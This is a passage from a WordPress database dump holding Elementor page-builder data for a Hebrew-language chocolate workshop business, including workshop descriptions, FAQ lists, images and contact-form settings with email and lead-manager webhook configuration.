\\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"56d7aa1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><span style=\\\"text-decoration: underline;\\\"><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/span><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34826&lm_key=8e0cfb811d714b40a0691df809a7a4d5\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1785,361,'_elementor_version','0.4'),(1787,93,'_elementor_pro_version','2.9.4'),(1789,362,'_wp_page_template','elementor_header_footer'),(1790,362,'_elementor_edit_mode','builder'),(1791,362,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"bebc84a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/u><\\/li><\\/ul><ul><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%d7%a1%d7%93%d7%a0%d7%aa-%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9c%d7%9e%d7%a1%d7%99%d7%91%d7%aa-%d7%a8%d7%95%d7%95%d7%a7%d7%95%d7%aa\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"chocolate4u\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34824&lm_key=fa721ea141794a3db374e600fc05ee2c\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1792,362,'_elementor_version','0.4'),(1793,362,'_elementor_template_type','post'),(17